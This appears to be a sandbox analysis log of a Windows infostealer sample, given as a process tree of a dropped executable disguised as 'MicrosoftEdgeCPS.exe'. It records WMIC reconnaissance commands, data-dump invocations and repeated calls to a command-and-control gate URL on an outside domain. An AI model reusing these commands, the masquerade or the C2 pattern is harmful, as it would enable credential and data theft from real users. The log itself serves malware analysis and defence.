PID 1060 wrote to memory of 1696	1060	MicrosoftEdgeCPS.exe	49
PID 1060 wrote to memory of 1696	1060	MicrosoftEdgeCPS.exe	49
PID 1060 wrote to memory of 1696	1060	MicrosoftEdgeCPS.exe	49
PID 1060 wrote to memory of 1696	1060	MicrosoftEdgeCPS.exe	49
PID 1060 wrote to memory of 1696	1060	MicrosoftEdgeCPS.exe	49
PID 1060 wrote to memory of 1692	1060	MicrosoftEdgeCPS.exe	50
PID 1060 wrote to memory of 1692	1060	MicrosoftEdgeCPS.exe	50
PID 1060 wrote to memory of 1692	1060	MicrosoftEdgeCPS.exe	50
PID 1060 wrote to memory of 1692	1060	MicrosoftEdgeCPS.exe	50
PID 1060 wrote to memory of 1692	1060	MicrosoftEdgeCPS.exe	50
PID 1060 wrote to memory of 1692	1060	MicrosoftEdgeCPS.exe	50
PID 1060 wrote to memory of 1692	1060	MicrosoftEdgeCPS.exe	50
PID 1060 wrote to memory of 1692	1060	MicrosoftEdgeCPS.exe	50
PID 1060 wrote to memory of 1692	1060	MicrosoftEdgeCPS.exe	50
PID 1060 wrote to memory of 1692	1060	MicrosoftEdgeCPS.exe	50
PID 1060 wrote to memory of 1064	1060	MicrosoftEdgeCPS.exe	51
PID 1060 wrote to memory of 1064	1060	MicrosoftEdgeCPS.exe	51
PID 1060 wrote to memory of 1064	1060	MicrosoftEdgeCPS.exe	51
PID 1060 wrote to memory of 1064	1060	MicrosoftEdgeCPS.exe	51
PID 1060 wrote to memory of 1064	1060	MicrosoftEdgeCPS.exe	51
PID 1060 wrote to memory of 1448	1060	MicrosoftEdgeCPS.exe	52
PID 1060 wrote to memory of 1448	1060	MicrosoftEdgeCPS.exe	52
PID 1060 wrote to memory of 1448	1060	MicrosoftEdgeCPS.exe	52
PID 1060 wrote to memory of 1448	1060	MicrosoftEdgeCPS.exe	52
PID 1060 wrote to memory of 1448	1060	MicrosoftEdgeCPS.exe	52
PID 1060 wrote to memory of 1448	1060	MicrosoftEdgeCPS.exe	52
PID 1060 wrote to memory of 1448	1060	MicrosoftEdgeCPS.exe	52
PID 1060 wrote to memory of 1448	1060	MicrosoftEdgeCPS.exe	52
PID 1060 wrote to memory of 1448	1060	MicrosoftEdgeCPS.exe	52
PID 1060 wrote to memory of 1448	1060	MicrosoftEdgeCPS.exe	52
PID 1060 wrote to memory of 328	1060	MicrosoftEdgeCPS.exe	53
PID 1060 wrote to memory of 328	1060	MicrosoftEdgeCPS.exe	53
PID 1060 wrote to memory of 328	1060	MicrosoftEdgeCPS.exe	53
PID 1060 wrote to memory of 328	1060	MicrosoftEdgeCPS.exe	53
PID 1060 wrote to memory of 328	1060	MicrosoftEdgeCPS.exe	53
PID 1060 wrote to memory of 328	1060	MicrosoftEdgeCPS.exe	53
PID 1060 wrote to memory of 328	1060	MicrosoftEdgeCPS.exe	53
PID 1060 wrote to memory of 328	1060	MicrosoftEdgeCPS.exe	53
PID 1060 wrote to memory of 1668	1060	MicrosoftEdgeCPS.exe	54
PID 1060 wrote to memory of 1668	1060	MicrosoftEdgeCPS.exe	54
PID 1060 wrote to memory of 1668	1060	MicrosoftEdgeCPS.exe	54
PID 1060 wrote to memory of 1668	1060	MicrosoftEdgeCPS.exe	54
PID 1060 wrote to memory of 1668	1060	MicrosoftEdgeCPS.exe	54
PID 1060 wrote to memory of 1668	1060	MicrosoftEdgeCPS.exe	54
PID 1060 wrote to memory of 1668	1060	MicrosoftEdgeCPS.exe	54
PID 1060 wrote to memory of 1668	1060	MicrosoftEdgeCPS.exe	54
PID 1060 wrote to memory of 2036	1060	MicrosoftEdgeCPS.exe	55
PID 1060 wrote to memory of 2036	1060	MicrosoftEdgeCPS.exe	55
PID 1060 wrote to memory of 2036	1060	MicrosoftEdgeCPS.exe	55
PID 1060 wrote to memory of 2036	1060	MicrosoftEdgeCPS.exe	55
PID 1060 wrote to memory of 2036	1060	MicrosoftEdgeCPS.exe	55
PID 1060 wrote to memory of 2036	1060	MicrosoftEdgeCPS.exe	55
PID 1060 wrote to memory of 2036	1060	MicrosoftEdgeCPS.exe	55
PID 1060 wrote to memory of 2036	1060	MicrosoftEdgeCPS.exe	55
PID 1060 wrote to memory of 2036	1060	MicrosoftEdgeCPS.exe	55
PID 1060 wrote to memory of 2036	1060	MicrosoftEdgeCPS.exe	55
PID 1448 wrote to memory of 976	1448	MicrosoftEdgeCPS.exe	56
PID 1448 wrote to memory of 976	1448	MicrosoftEdgeCPS.exe	56
PID 1448 wrote to memory of 976	1448	MicrosoftEdgeCPS.exe	56
PID 1448 wrote to memory of 976	1448	MicrosoftEdgeCPS.exe	56
PID 1448 wrote to memory of 976	1448	MicrosoftEdgeCPS.exe	56
PID 1448 wrote to memory of 976	1448	MicrosoftEdgeCPS.exe	56
PID 1448 wrote to memory of 976	1448	MicrosoftEdgeCPS.exe	56
PID 1448 wrote to memory of 976	1448	MicrosoftEdgeCPS.exe	56
PID 1448 wrote to memory of 976	1448	MicrosoftEdgeCPS.exe	56
PID 1448 wrote to memory of 1992	1448	MicrosoftEdgeCPS.exe	57
PID 1448 wrote to memory of 1992	1448	MicrosoftEdgeCPS.exe	57
PID 1448 wrote to memory of 1992	1448	MicrosoftEdgeCPS.exe	57
PID 1448 wrote to memory of 1992	1448	MicrosoftEdgeCPS.exe	57
PID 1060 wrote to memory of 960	1060	MicrosoftEdgeCPS.exe	58
PID 1060 wrote to memory of 960	1060	MicrosoftEdgeCPS.exe	58
PID 1060 wrote to memory of 960	1060	MicrosoftEdgeCPS.exe	58
PID 1060 wrote to memory of 960	1060	MicrosoftEdgeCPS.exe	58
PID 1060 wrote to memory of 960	1060	MicrosoftEdgeCPS.exe	58
PID 1060 wrote to memory of 296	1060	MicrosoftEdgeCPS.exe	59
PID 1060 wrote to memory of 296	1060	MicrosoftEdgeCPS.exe	59
PID 1060 wrote to memory of 296	1060	MicrosoftEdgeCPS.exe	59
PID 1060 wrote to memory of 296	1060	MicrosoftEdgeCPS.exe	59
PID 2036 wrote to memory of 1852	2036	MicrosoftEdgeCPS.exe	61
PID 2036 wrote to memory of 1852	2036	MicrosoftEdgeCPS.exe	61
PID 2036 wrote to memory of 1852	2036	MicrosoftEdgeCPS.exe	61
PID 2036 wrote to memory of 1852	2036	MicrosoftEdgeCPS.exe	61
PID 1060 wrote to memory of 1292	1060	MicrosoftEdgeCPS.exe	62
PID 1060 wrote to memory of 1292	1060	MicrosoftEdgeCPS.exe	62
PID 1060 wrote to memory of 1292	1060	MicrosoftEdgeCPS.exe	62
PID 1060 wrote to memory of 1292	1060	MicrosoftEdgeCPS.exe	62
PID 976 wrote to memory of 1112	976	86.0.4240.111_chrome_installer.exe	64
PID 976 wrote to memory of 1112	976	86.0.4240.111_chrome_installer.exe	64
PID 976 wrote to memory of 1112	976	86.0.4240.111_chrome_installer.exe	64
PID 1112 wrote to memory of 1836	1112	setup.exe	65
PID 1112 wrote to memory of 1836	1112	setup.exe	65
PID 1112 wrote to memory of 1836	1112	setup.exe	65
PID 1112 wrote to memory of 772	1112	setup.exe	66
PID 1112 wrote to memory of 772	1112	setup.exe	66
PID 1112 wrote to memory of 772	1112	setup.exe	66
PID 772 wrote to memory of 1192	772	chrome.exe	67
PID 772 wrote to memory of 1192	772	chrome.exe	67
PID 772 wrote to memory of 1192	772	chrome.exe	67
PID 772 wrote to memory of 296	772	chrome.exe	68
PID 772 wrote to memory of 296	772	chrome.exe	68
PID 772 wrote to memory of 296	772	chrome.exe	68
PID 772 wrote to memory of 296	772	chrome.exe	68
PID 772 wrote to memory of 296	772	chrome.exe	68
PID 772 wrote to memory of 296	772	chrome.exe	68
PID 772 wrote to memory of 296	772	chrome.exe	68
PID 772 wrote to memory of 296	772	chrome.exe	68
PID 772 wrote to memory of 296	772	chrome.exe	68
PID 772 wrote to memory of 296	772	chrome.exe	68
PID 772 wrote to memory of 296	772	chrome.exe	68
PID 772 wrote to memory of 296	772	chrome.exe	68
PID 772 wrote to memory of 296	772	chrome.exe	68
PID 772 wrote to memory of 296	772	chrome.exe	68
PID 772 wrote to memory of 296	772	chrome.exe	68
PID 772 wrote to memory of 296	772	chrome.exe	68
PID 772 wrote to memory of 296	772	chrome.exe	68
PID 772 wrote to memory of 296	772	chrome.exe	68
PID 772 wrote to memory of 296	772	chrome.exe	68
PID 772 wrote to memory of 296	772	chrome.exe	68
PID 772 wrote to memory of 296	772	chrome.exe	68
PID 772 wrote to memory of 296	772	chrome.exe	68
PID 772 wrote to memory of 296	772	chrome.exe	68
PID 772 wrote to memory of 296	772	chrome.exe	68
PID 772 wrote to memory of 296	772	chrome.exe	68
PID 772 wrote to memory of 296	772	chrome.exe	68
PID 772 wrote to memory of 296	772	chrome.exe	68
PID 772 wrote to memory of 296	772	chrome.exe	68
PID 772 wrote to memory of 296	772	chrome.exe	68
PID 772 wrote to memory of 296	772	chrome.exe	68
PID 772 wrote to memory of 296	772	chrome.exe	68
PID 772 wrote to memory of 296	772	chrome.exe	68
PID 772 wrote to memory of 296	772	chrome.exe	68
PID 772 wrote to memory of 296	772	chrome.exe	68
PID 772 wrote to memory of 296	772	chrome.exe	68
PID 772 wrote to memory of 296	772	chrome.exe	68
PID 772 wrote to memory of 296	772	chrome.exe	68
PID 772 wrote to memory of 296	772	chrome.exe	68
PID 772 wrote to memory of 296	772	chrome.exe	68
PID 772 wrote to memory of 296	772	chrome.exe	68
PID 772 wrote to memory of 296	772	chrome.exe	68
PID 772 wrote to memory of 1196	772	chrome.exe	69
PID 772 wrote to memory of 1196	772	chrome.exe	69
PID 772 wrote to memory of 1196	772	chrome.exe	69
PID 772 wrote to memory of 700	772	chrome.exe	70
PID 772 wrote to memory of 700	772	chrome.exe	70
PID 772 wrote to memory of 700	772	chrome.exe	70
PID 772 wrote to memory of 700	772	chrome.exe	70
PID 772 wrote to memory of 700	772	chrome.exe	70
PID 772 wrote to memory of 700	772	chrome.exe	70
PID 772 wrote to memory of 700	772	chrome.exe	70
PID 772 wrote to memory of 700	772	chrome.exe	70
PID 772 wrote to memory of 700	772	chrome.exe	70
PID 772 wrote to memory of 700	772	chrome.exe	70
PID 772 wrote to memory of 700	772	chrome.exe	70
PID 772 wrote to memory of 700	772	chrome.exe	70
PID 772 wrote to memory of 700	772	chrome.exe	70
PID 772 wrote to memory of 700	772	chrome.exe	70
PID 772 wrote to memory of 700	772	chrome.exe	70
PID 772 wrote to memory of 700	772	chrome.exe	70
PID 772 wrote to memory of 700	772	chrome.exe	70
PID 772 wrote to memory of 700	772	chrome.exe	70
PID 772 wrote to memory of 700	772	chrome.exe	70
PID 772 wrote to memory of 700	772	chrome.exe	70
PID 772 wrote to memory of 700	772	chrome.exe	70
PID 772 wrote to memory of 700	772	chrome.exe	70
PID 772 wrote to memory of 700	772	chrome.exe	70
PID 772 wrote to memory of 700	772	chrome.exe	70
PID 772 wrote to memory of 700	772	chrome.exe	70
PID 772 wrote to memory of 700	772	chrome.exe	70
PID 772 wrote to memory of 700	772	chrome.exe	70
PID 772 wrote to memory of 700	772	chrome.exe	70
PID 772 wrote to memory of 700	772	chrome.exe	70
PID 772 wrote to memory of 700	772	chrome.exe	70
PID 772 wrote to memory of 700	772	chrome.exe	70
PID 772 wrote to memory of 700	772	chrome.exe	70
PID 772 wrote to memory of 700	772	chrome.exe	70
PID 772 wrote to memory of 700	772	chrome.exe	70
PID 772 wrote to memory of 700	772	chrome.exe	70
PID 772 wrote to memory of 700	772	chrome.exe	70
PID 772 wrote to memory of 700	772	chrome.exe	70
PID 772 wrote to memory of 700	772	chrome.exe	70
PID 772 wrote to memory of 700	772	chrome.exe	70
PID 772 wrote to memory of 700	772	chrome.exe	70
PID 772 wrote to memory of 700	772	chrome.exe	70
PID 772 wrote to memory of 1812	772	chrome.exe	71
PID 772 wrote to memory of 1812	772	chrome.exe	71
PID 772 wrote to memory of 1812	772	chrome.exe	71
PID 772 wrote to memory of 1812	772	chrome.exe	71
PID 772 wrote to memory of 1812	772	chrome.exe	71
PID 772 wrote to memory of 1812	772	chrome.exe	71
PID 772 wrote to memory of 1812	772	chrome.exe	71
PID 772 wrote to memory of 1812	772	chrome.exe	71
PID 772 wrote to memory of 1812	772	chrome.exe	71
PID 772 wrote to memory of 1812	772	chrome.exe	71
PID 772 wrote to memory of 1812	772	chrome.exe	71
PID 772 wrote to memory of 1812	772	chrome.exe	71
PID 772 wrote to memory of 1812	772	chrome.exe	71
PID 772 wrote to memory of 1812	772	chrome.exe	71
PID 772 wrote to memory of 1812	772	chrome.exe	71
PID 772 wrote to memory of 1812	772	chrome.exe	71
PID 772 wrote to memory of 1812	772	chrome.exe	71
PID 772 wrote to memory of 1812	772	chrome.exe	71
PID 772 wrote to memory of 1812	772	chrome.exe	71
PID 772 wrote to memory of 1812	772	chrome.exe	71
PID 772 wrote to memory of 1812	772	chrome.exe	71
PID 772 wrote to memory of 1812	772	chrome.exe	71
PID 772 wrote to memory of 1812	772	chrome.exe	71
PID 772 wrote to memory of 1812	772	chrome.exe	71
PID 772 wrote to memory of 1812	772	chrome.exe	71
PID 772 wrote to memory of 1812	772	chrome.exe	71
PID 772 wrote to memory of 1812	772	chrome.exe	71
PID 772 wrote to memory of 1812	772	chrome.exe	71
PID 772 wrote to memory of 1812	772	chrome.exe	71
PID 772 wrote to memory of 1812	772	chrome.exe	71
PID 772 wrote to memory of 1812	772	chrome.exe	71
PID 772 wrote to memory of 1812	772	chrome.exe	71
PID 772 wrote to memory of 1812	772	chrome.exe	71
PID 772 wrote to memory of 1812	772	chrome.exe	71
PID 772 wrote to memory of 1812	772	chrome.exe	71
PID 772 wrote to memory of 1812	772	chrome.exe	71
PID 772 wrote to memory of 1812	772	chrome.exe	71
PID 772 wrote to memory of 1812	772	chrome.exe	71
PID 772 wrote to memory of 1812	772	chrome.exe	71
PID 772 wrote to memory of 1812	772	chrome.exe	71
PID 772 wrote to memory of 1812	772	chrome.exe	71
PID 772 wrote to memory of 1812	772	chrome.exe	71
PID 772 wrote to memory of 1812	772	chrome.exe	71
PID 772 wrote to memory of 1848	772	chrome.exe	72
PID 772 wrote to memory of 1848	772	chrome.exe	72
PID 772 wrote to memory of 1848	772	chrome.exe	72
PID 772 wrote to memory of 1848	772	chrome.exe	72
PID 772 wrote to memory of 1848	772	chrome.exe	72
PID 772 wrote to memory of 1848	772	chrome.exe	72
PID 772 wrote to memory of 1848	772	chrome.exe	72
PID 772 wrote to memory of 1848	772	chrome.exe	72
PID 772 wrote to memory of 1848	772	chrome.exe	72
PID 772 wrote to memory of 1848	772	chrome.exe	72
PID 772 wrote to memory of 1848	772	chrome.exe	72
PID 772 wrote to memory of 1848	772	chrome.exe	72
PID 772 wrote to memory of 1848	772	chrome.exe	72
PID 772 wrote to memory of 1848	772	chrome.exe	72
PID 772 wrote to memory of 1848	772	chrome.exe	72
PID 772 wrote to memory of 1848	772	chrome.exe	72
PID 772 wrote to memory of 1848	772	chrome.exe	72
PID 772 wrote to memory of 1848	772	chrome.exe	72
PID 772 wrote to memory of 1848	772	chrome.exe	72
PID 772 wrote to memory of 1848	772	chrome.exe	72
PID 772 wrote to memory of 1848	772	chrome.exe	72
PID 772 wrote to memory of 1848	772	chrome.exe	72
PID 772 wrote to memory of 1848	772	chrome.exe	72
PID 772 wrote to memory of 1848	772	chrome.exe	72
PID 772 wrote to memory of 1848	772	chrome.exe	72
PID 772 wrote to memory of 1848	772	chrome.exe	72
PID 772 wrote to memory of 1848	772	chrome.exe	72
PID 772 wrote to memory of 1848	772	chrome.exe	72
PID 772 wrote to memory of 1848	772	chrome.exe	72
PID 772 wrote to memory of 1848	772	chrome.exe	72
PID 772 wrote to memory of 1848	772	chrome.exe	72
PID 772 wrote to memory of 1848	772	chrome.exe	72
PID 772 wrote to memory of 1848	772	chrome.exe	72
PID 772 wrote to memory of 1848	772	chrome.exe	72
PID 772 wrote to memory of 1848	772	chrome.exe	72
PID 772 wrote to memory of 1848	772	chrome.exe	72
PID 772 wrote to memory of 1848	772	chrome.exe	72
PID 772 wrote to memory of 1848	772	chrome.exe	72
PID 772 wrote to memory of 1848	772	chrome.exe	72
PID 772 wrote to memory of 1848	772	chrome.exe	72
PID 772 wrote to memory of 1848	772	chrome.exe	72
PID 772 wrote to memory of 1848	772	chrome.exe	72
PID 772 wrote to memory of 1848	772	chrome.exe	72

C:\Users\Admin\AppData\Local\Temp\958d8e1498f1b3db2c79a62f78da66520654243f25acb19025874066b92618c7.exe
"C:\Users\Admin\AppData\Local\Temp\958d8e1498f1b3db2c79a62f78da66520654243f25acb19025874066b92618c7.exe"
1⤵
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:296
- C:\Users\Admin\AppData\Roaming\EdgeCP\MicrosoftEdgeCPS.exe
  "C:\Users\Admin\AppData\Roaming\EdgeCP\MicrosoftEdgeCPS.exe"
  2⤵
  - Executes dropped EXE
  - Loads dropped DLL
  - Suspicious use of SetThreadContext
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of WriteProcessMemory
  PID:1060
- - C:\Windows\SysWOW64\Wbem\wmic.exe
    "wmic" /Node:localhost /Namespace:\\root\SecurityCenter2 path AntiVirusProduct get DisplayName /FORMAT:List
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:332
- - C:\Windows\SysWOW64\Wbem\wmic.exe
    "wmic" os get caption /FORMAT:List
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:344
- - C:\Windows\SysWOW64\Wbem\wmic.exe
    "wmic" path win32_VideoController get caption /FORMAT:List
    3⤵
    PID:560
- - C:\Windows\SysWOW64\Wbem\wmic.exe
    "wmic" path win32_NetworkAdapterConfiguration where IPEnabled=1 get IPAddress /FORMAT:List
    3⤵
    PID:888
- - C:\Windows\SysWOW64\Wbem\wmic.exe
    "wmic" LogicalDisk Where DriveType=4 get VolumeName /FORMAT:List
    3⤵
    PID:1596
- - C:\Windows\SysWOW64\Wbem\wmic.exe
    "wmic" path win32_PingStatus where address='rusacenwaxalvi.xyz' get StatusCode /FORMAT:List
    3⤵
    PID:1444
- - C:\Windows\SysWOW64\Wbem\wmic.exe
    "wmic" path win32_PingStatus where address='rusacenwaxalvi.xyz' get ResponseTime /FORMAT:List
    3⤵
    PID:1668
- - C:\Users\Admin\AppData\Roaming\EdgeCP\MicrosoftEdgeCPS.exe
    /scomma "C:\Users\Admin\AppData\Roaming\EdgeCP\1.log"
    3⤵
    - Executes dropped EXE
    - Suspicious behavior: EnumeratesProcesses
    PID:1656
- - C:\Users\Admin\AppData\Roaming\EdgeCP\MicrosoftEdgeCPS.exe
    /scomma "C:\Users\Admin\AppData\Roaming\EdgeCP\4.log"
    3⤵
    - Executes dropped EXE
    - Suspicious use of SetWindowsHookEx
    PID:1956
- - C:\Users\Admin\AppData\Roaming\EdgeCP\MicrosoftEdgeCPS.exe
    /scomma "C:\Users\Admin\AppData\Roaming\EdgeCP\2.log"
    3⤵
    - Executes dropped EXE
    PID:1344
- - C:\Users\Admin\AppData\Roaming\EdgeCP\MicrosoftEdgeCPS.exe
    /scomma "C:\Users\Admin\AppData\Roaming\EdgeCP\3.log"
    3⤵
    - Executes dropped EXE
    PID:1696
- - C:\Users\Admin\AppData\Roaming\EdgeCP\MicrosoftEdgeCPS.exe
    /VisitTimeFilterType 2 /VisitTimeFilterValue 6 /scomma "C:\Users\Admin\AppData\Roaming\EdgeCP\6.log"
    3⤵
    - Executes dropped EXE
    - Suspicious behavior: EnumeratesProcesses
    PID:1692
- - C:\Users\Admin\AppData\Roaming\EdgeCP\MicrosoftEdgeCPS.exe
    /scomma "C:\Users\Admin\AppData\Roaming\EdgeCP\5.log"
    3⤵
    - Executes dropped EXE
    PID:1064
- - C:\Users\Admin\AppData\Roaming\EdgeCP\MicrosoftEdgeCPS.exe
    X http://rusacenwaxalvi.xyz/dimwebpan/gate.php*Mozilla/5.0 (Macintosh; Intel Mac OS X 11_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.141*7052770e4931b3197e6e9a0bccc1d841
    3⤵
    - Executes dropped EXE
    - Suspicious use of SetThreadContext
    PID:1448
  - - C:\Program Files (x86)\Google\Update\Download\{8A69D345-D564-463C-AFF1-A69D9E530F96}\86.0.4240.111\86.0.4240.111_chrome_installer.exe
      X C:\Users\Admin\AppData\Roaming\EdgeCP\MicrosoftEdgeCPS.exe
      4⤵
      Loads dropped DLL
      Drops file in Program Files directory
      PID:976
    - - C:\Program Files (x86)\Google\Update\Download\{8A69D345-D564-463C-AFF1-A69D9E530F96}\86.0.4240.111\CR_586B5.tmp\setup.exe
        
        "C:\Program Files (x86)\Google\Update\Download\{8A69D345-D564-463C-AFF1-A69D9E530F96}\86.0.4240.111\CR_586B5.tmp\setup.exe" --install-archive="C:\Program Files (x86)\Google\Update\Download\{8A69D345-D564-463C-AFF1-A69D9E530F96}\86.0.4240.111\CR_586B5.tmp\CHROME.PACKED.7Z" X C:\Users\Admin\AppData\Roaming\EdgeCP\MicrosoftEdgeCPS.exe
        5⤵
        Executes dropped EXE
        Loads dropped DLL
        
        PID:1112
      - C:\Program Files (x86)\Google\Update\Download\{8A69D345-D564-463C-AFF1-A69D9E530F96}\86.0.4240.111\CR_586B5.tmp\setup.exe
        
        "C:\Program Files (x86)\Google\Update\Download\{8A69D345-D564-463C-AFF1-A69D9E530F96}\86.0.4240.111\CR_586B5.tmp\setup.exe" --type=crashpad-handler /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=86.0.4240.111 --initial-client-data=0x144,0x148,0x14c,0x118,0x150,0x13fc77740,0x13fc77750,0x13fc77760
        6⤵
        Executes dropped EXE
        
        PID:1836
      - C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --force-first-run
        6⤵
        Suspicious use of FindShellTrayWindow
        
        PID:772
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=86.0.4240.111 --initial-client-data=0xbc,0xc0,0xc4,0x90,0xc8,0x7fef69f6e00,0x7fef69f6e10,0x7fef69f6e20
        7⤵
        
        PID:1192
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --field-trial-handle=1016,11205144303199261313,6687584866840904184,131072 --gpu-preferences=MAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAQAAAAAAAAAAAAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAA= --mojo-platform-channel-handle=1068 /prefetch:2
        7⤵
        
        PID:296
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1016,11205144303199261313,6687584866840904184,131072 --lang=en-US --service-sandbox-type=network --mojo-platform-channel-handle=1340 /prefetch:8
        7⤵
        Suspicious behavior: EnumeratesProcesses
        
        PID:1196
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=1016,11205144303199261313,6687584866840904184,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=1832 /prefetch:8
        7⤵
        
        PID:700
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1016,11205144303199261313,6687584866840904184,131072 --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2016 /prefetch:1
        7⤵
        
        PID:1812
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1016,11205144303199261313,6687584866840904184,131072 --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2060 /prefetch:1
        7⤵
        
        PID:1848
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1016,11205144303199261313,6687584866840904184,131072 --lang=en-US --extension-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2408 /prefetch:1
        7⤵
        
        PID:2072
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1016,11205144303199261313,6687584866840904184,131072 --lang=en-US --extension-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2456 /prefetch:1
        7⤵
        
        PID:2108
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1016,11205144303199261313,6687584866840904184,131072 --lang=en-US --extension-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2500 /prefetch:1
        7⤵
        
        PID:2152
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1016,11205144303199261313,6687584866840904184,131072 --lang=en-US --extension-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2508 /prefetch:1
        7⤵
        
        PID:2180
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1016,11205144303199261313,6687584866840904184,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2716 /prefetch:8
        7⤵
        
        PID:2404
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --field-trial-handle=1016,11205144303199261313,6687584866840904184,131072 --gpu-preferences=MAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAQAAAAAAAAAAAAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAA= --use-gl=swiftshader-webgl --mojo-platform-channel-handle=3388 /prefetch:2
        7⤵
        
        PID:2820
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1016,11205144303199261313,6687584866840904184,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=3468 /prefetch:8
        7⤵
        
        PID:2956
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 1448 -s 100
      4⤵
      Loads dropped DLL
      Program crash
      Suspicious behavior: EnumeratesProcesses
      PID:1992
- - C:\Users\Admin\AppData\Roaming\EdgeCP\MicrosoftEdgeCPS.exe
    X http://rusacenwaxalvi.xyz/dimwebpan/gate.php*Mozilla/5.0 (Macintosh; Intel Mac OS X 11_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.141*7052770e4931b3197e6e9a0bccc1d841
    3⤵
    - Executes dropped EXE
    - Suspicious use of SetWindowsHookEx
    PID:328
- - C:\Users\Admin\AppData\Roaming\EdgeCP\MicrosoftEdgeCPS.exe
    X http://rusacenwaxalvi.xyz/dimwebpan/gate.php*Mozilla/5.0 (Macintosh; Intel Mac OS X 11_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.141*7052770e4931b3197e6e9a0bccc1d841
    3⤵
    - Executes dropped EXE
    - Suspicious use of SetWindowsHookEx
    PID:1668
- - C:\Users\Admin\AppData\Roaming\EdgeCP\MicrosoftEdgeCPS.exe
    X http://rusacenwaxalvi.xyz/dimwebpan/gate.php*Mozilla/5.0 (Macintosh; Intel Mac OS X 11_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.141*7052770e4931b3197e6e9a0bccc1d841
    3⤵
    - Executes dropped EXE
    - Suspicious behavior: EnumeratesProcesses
    PID:2036
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 2036 -s 276
      4⤵
      Loads dropped DLL
      Program crash
      Suspicious behavior: EnumeratesProcesses
      PID:1852
- - C:\Users\Admin\AppData\Roaming\EdgeCP\MicrosoftEdgeCPS.exe
